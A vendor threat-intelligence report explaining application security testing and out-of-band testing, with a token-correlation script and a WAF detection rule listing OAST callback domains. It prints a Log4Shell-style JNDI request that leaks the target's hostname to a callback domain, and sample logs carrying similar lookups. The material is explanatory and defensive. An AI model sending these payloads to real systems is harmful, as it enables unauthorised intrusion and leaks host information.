[2024.04 Vulnerability Report] OAST Application Security Testing Techniques | Cloud-Based Platform AIONCLOUD

Threat Intelligence Report




1. What is AST?

Application security testing (AST) is an important component of IT security that focuses on identifying and mitigating vulnerabilities and weaknesses within software applications. AST encompasses a variety of techniques and tools designed to assess the security posture of applications, including web and mobile applications. The primary goal of AST is to find potential security flaws, such as code vulnerabilities, misconfigurations, and logic flaws, that an attacker could exploit to compromise the confidentiality, integrity, or availability of an application and its data. By performing AST, organizations can proactively identify and remediate security risks and keep their applications resilient and reliable in the face of evolving cyber threats.

 


2. Application Security Testing (AST) Categorization

AST (Application Security Testing): finding exploitable vulnerabilities or security holes in an application.

[Figure: AST tool pyramid; tools become more integrated as you move up the pyramid. Image source: https://insights.sei.cmu.edu]

  • SAST (Static Application Security Testing): Analyzes an application's source code or binary without running the program to check for security vulnerabilities.
  • DAST (Dynamic Application Security Testing): Tests a running application for vulnerabilities by simulating attacks and analyzing the responses.
  • SCA (Software Composition Analysis): Identifies known security vulnerabilities in the open-source components used in application development.
  • Database Security Scanning: Scans databases for security vulnerabilities.
  • MAST (Mobile Application Security Testing): Detects security vulnerabilities in mobile applications using static analysis, dynamic analysis, forensic techniques, and more.
  • IAST (Interactive Application Security Testing): Combines SAST (static analysis) and DAST (dynamic analysis) technologies to detect vulnerabilities; it reduces false positives by analyzing source code before compilation and then detecting vulnerabilities in the running application.
  • ASTaaS (AST as a Service): Provides static analysis (SAST), dynamic analysis (DAST), penetration testing, and related services for applications as a cloud service.
  • Correlation Tools: Reduce false positives by collecting the results of multiple AST tools in a central repository and analyzing them together.
  • Test-Coverage Analyzers: Measure how much of the code was exercised, broken down by code region, to check whether specific lines or logical branches are actually reached during program execution.
  • ASTO (Application Security Testing Orchestration): A unified platform that addresses the difficulty of integrating results from AST tools of different vendors, as well as the time and cost of scanning and fixing vulnerabilities.

3. What is OAST?

Out-of-Band Application Security Testing (OAST) is a methodology used to assess the security of a web application by utilizing an external server to interact with the target application through an out-of-band channel.

[Figure: OAST interaction between the tester, the target application, and an external out-of-band server. Image source: https://omoknooni.tistory.com/m/116]

As you can see from the figure above, unlike traditional testing methods, OAST does not rely solely on interactions within the application. Instead, it utilizes external communication channels such as DNS, HTTP, or other network protocols to identify vulnerabilities that are not visible with traditional testing approaches.


4. How OAST works

  1. Identify the target: Identify the target web application or system to be tested for security vulnerabilities.

  2. Set up an external server: Configure an external server to interact with the target application over an out-of-band channel.

  3. Inject traffic: Inject test payloads or traffic into the target application through the external server to trigger potential vulnerabilities.

  4. Response analysis: Analyze the responses received from the target application to identify abnormal behavior or security weaknesses.

  5. Vulnerability detection: Report the vulnerabilities revealed by the out-of-band interactions, such as injection flaws, access control issues, or sensitive data exposure.
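The five steps above are, in code, a correlation problem: every payload carries a unique token in the callback name, and the external server's interaction log is later matched back to the injection point that produced each token. The following is an added example of that correlation logic, not code from this report or from any OAST tool (Interactsh and Burp Collaborator implement the same idea). The callback domain oast.example, the probe templates, and the recorded interactions are all constructed for the demonstration.

```python
import secrets
from dataclasses import dataclass
from typing import Dict, List, Optional

# Assumed tester-controlled callback domain (placeholder, not a real OAST service).
OAST_DOMAIN = "oast.example"


@dataclass
class Probe:
    """One test payload: a unique token ties it to the injection point it was sent to."""
    token: str
    injection_point: str
    payload: str


@dataclass
class Interaction:
    """One callback recorded by the external server (step 2 of the procedure)."""
    protocol: str    # "dns" or "http"
    hostname: str    # name that was resolved or requested, e.g. "<token>.oast.example"
    source_ip: str


def issue_probe(injection_point: str, template: str, domain: str = OAST_DOMAIN) -> Probe:
    """Step 3: build a payload whose callback name carries a fresh random token."""
    token = secrets.token_hex(8)
    callback = f"{token}.{domain}"
    return Probe(token, injection_point, template.format(callback=callback))


def token_from_hostname(hostname: str, domain: str = OAST_DOMAIN) -> Optional[str]:
    """Recover the token: it is the label directly under the callback domain.
    Any labels to its left (e.g. a hostname prepended by the target) are extra data."""
    host = hostname.lower().rstrip(".")
    suffix = "." + domain.lower()
    if not host.endswith(suffix):
        return None
    labels = host[: -len(suffix)].split(".")
    return labels[-1] or None


def correlate(probes: List[Probe], interactions: List[Interaction],
              domain: str = OAST_DOMAIN) -> Dict[str, List[Interaction]]:
    """Step 4: map each recorded callback back to the probe that caused it.
    Callbacks with unknown tokens are ignored (background noise, other testers)."""
    by_token = {p.token: p for p in probes}
    hits: Dict[str, List[Interaction]] = {}
    for it in interactions:
        token = token_from_hostname(it.hostname, domain)
        if token in by_token:
            hits.setdefault(token, []).append(it)
    return hits


def summarize(probes: List[Probe], hits: Dict[str, List[Interaction]]) -> Dict[str, List[str]]:
    """Step 5: per injection point, which protocols reached the external server.
    An empty list means no out-of-band evidence for that probe."""
    return {p.injection_point: sorted({it.protocol for it in hits.get(p.token, [])})
            for p in probes}


def demo() -> Dict[str, List[str]]:
    """Constructed scenario: three probes are issued, the server later reports callbacks."""
    probes = [
        issue_probe("GET /fetch?url=", "http://{callback}/"),
        issue_probe("POST /import (XML body)", "http://{callback}/x.dtd"),
        issue_probe("GET /search?q=", "{callback}"),
    ]
    other = secrets.token_hex(8)  # a token we never issued
    interactions = [
        Interaction("dns", f"{probes[0].token}.{OAST_DOMAIN}", "192.0.2.10"),
        Interaction("http", f"{probes[0].token}.{OAST_DOMAIN}", "192.0.2.10"),
        # DNS only: the resolver reached us but HTTP egress was blocked; still a finding.
        Interaction("dns", f"app01.{probes[1].token}.{OAST_DOMAIN}", "192.0.2.10"),
        Interaction("dns", f"{other}.{OAST_DOMAIN}", "198.51.100.5"),
    ]
    return summarize(probes, correlate(probes, interactions))


if __name__ == "__main__":
    for point, protocols in demo().items():
        print(f"{point:28s} -> {protocols or 'no callback'}")
```

Two details matter in practice. A DNS-only interaction is still a finding: the target resolved the attacker-chosen name even though its HTTP egress was filtered, which is exactly why the figure above shows DNS as a separate channel. And the token sits directly under the callback domain, so anything the target prepends (such as its own hostname) survives as extra labels without breaking correlation.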


5. Why use OAST?

  • Detect hidden vulnerabilities: OAST can find vulnerabilities that traditional testing methods may miss, including those that can only be exploited through out-of-band channels.

  • Comprehensive security coverage: OAST complements traditional security testing approaches to provide more comprehensive coverage and help identify blind spots in application security.

  • Protection against advanced threats: OAST helps organizations defend against advanced threats by discovering vulnerabilities that attackers can exploit to compromise applications or their data.



6. OAST scan examples

Typical vulnerabilities that can be identified using OAST techniques:

  • Out-of-band SQL injection (OOB SQLi)

  • Blind XSS

  • OS code injection

  • Server-side request forgery

  • XML external entity (XXE) injection

The same technique was used during the widely publicized Log4Shell campaign: the JNDI lookup payload pointed at a subdomain of the OAST domain, with a target-identifying value such as the hostname prepended as a further label, so a single out-of-band (OOB) lookup immediately revealed which targets were vulnerable.

GET /?test=${jndi:ldap://${hostName}.oast.service} HTTP/1.1
Host: sample.com

7. Responding to OAST scans

There is a risk that an OAST scan could allow an attacker to identify vulnerable parts of the target and launch an attack.

The image below shows an attack that appears to have attempted to use Interactsh to scan for vulnerabilities with OAST techniques.

[Figure: captured requests attempting an OAST scan via Interactsh]

In AIWAF, we have measures in place to block OAST scanning that has not been coordinated with security personnel.

However, this cannot always be registered as a permanent pattern, because it could also detect and block legitimate, authorized scanning; we therefore provide it as a custom pattern on request.
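The trade-off described in this section, catching OAST callbacks in request traffic while not breaking coordinated scans, can be expressed as a small detection rule. The following is an added example written for this report; it is not AIWAF's pattern or any vendor's code. The list of public OAST callback domains, the allowlist of coordinated scanner addresses, the log format, and the four log lines are all assumptions constructed for the demonstration.

```python
import ipaddress
import re
from typing import Dict, List, Optional, Tuple
from urllib.parse import unquote

# Assumed list of public OAST callback domains, maintained by the defender; extend as needed.
OAST_DOMAINS = (
    "interact.sh", "oast.pro", "oast.live", "oast.site", "oast.online",
    "oast.fun", "oast.me", "oastify.com", "burpcollaborator.net",
)

# Assumed allowlist: scanner sources coordinated with security staff (RFC 5737 documentation range).
COORDINATED_SCANNERS = (ipaddress.ip_network("203.0.113.0/24"),)

# Anything shaped like a hostname, and the JNDI lookup prefix seen in Log4Shell-style requests.
HOST_RE = re.compile(r"[a-z0-9](?:[a-z0-9-]*[a-z0-9])?(?:\.[a-z0-9](?:[a-z0-9-]*[a-z0-9])?)+", re.I)
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)", re.I)

# Combined-log-format access line (constructed format for this example).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def find_oast_indicators(text: str) -> List[Tuple[str, str]]:
    """Return (kind, value) pairs: callback hostnames under a known OAST domain, and JNDI
    lookup schemes. Input is URL-decoded once so %7B-style encoding does not hide them."""
    decoded = unquote(text)
    hits: List[Tuple[str, str]] = []
    for m in HOST_RE.finditer(decoded):
        host = m.group(0).lower()
        if any(host == d or host.endswith("." + d) for d in OAST_DOMAINS):
            hits.append(("oast_domain", host))
    for m in JNDI_RE.finditer(decoded):
        hits.append(("jndi_lookup", m.group(1).lower()))
    return hits


def analyze_log_line(line: str) -> Optional[Dict]:
    """Inspect path, Referer and User-Agent; decide block vs alert-only by source address."""
    m = LOG_RE.match(line)
    if not m:
        return None
    indicators: List[Tuple[str, str]] = []
    for part in ("path", "referer", "ua"):
        indicators += find_oast_indicators(m[part])
    if not indicators:
        return None
    ip = ipaddress.ip_address(m["ip"])
    coordinated = any(ip in net for net in COORDINATED_SCANNERS)
    return {
        "ip": m["ip"],
        "path": m["path"],
        "indicators": indicators,
        # Coordinated scans are still logged, but only uncoordinated ones are blocked.
        "action": "alert_only" if coordinated else "block",
    }


def scan_log(lines: List[str]) -> List[Dict]:
    """Run the check over many lines, returning only those with OAST indicators."""
    return [r for r in (analyze_log_line(line) for line in lines) if r]


# Constructed sample traffic (addresses from RFC 5737 ranges; tokens are made up).
SAMPLE_LOGS = [
    '198.51.100.7 - - [10/Apr/2024:10:15:32 +0000] "GET /?test=$%7Bjndi:ldap://c3rq1abc.oast.pro/a%7D HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.15 - - [10/Apr/2024:10:16:01 +0000] "GET /api/fetch?url=http://d8f2k1.interact.sh/ HTTP/1.1" 200 88 "-" "Nuclei"',
    '192.0.2.44 - - [10/Apr/2024:10:16:05 +0000] "GET /index.html HTTP/1.1" 200 1024 "https://www.example.com/" "Mozilla/5.0"',
    '198.51.100.9 - - [10/Apr/2024:10:17:40 +0000] "GET /login HTTP/1.1" 200 300 "-" "${jndi:dns://probe.example.net/a}"',
]

if __name__ == "__main__":
    for r in scan_log(SAMPLE_LOGS):
        print(r["action"], r["ip"], r["path"], r["indicators"])
```

The rule inspects headers as well as the query string, because the JNDI lookup in the fourth line arrives in the User-Agent rather than the path, and it keeps the JNDI check separate from the domain check so that a callback to a domain not yet on the list still raises an alert. The allowlist is what keeps the pattern from blocking authorized testing; without it, exactly the false positives described above would occur.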

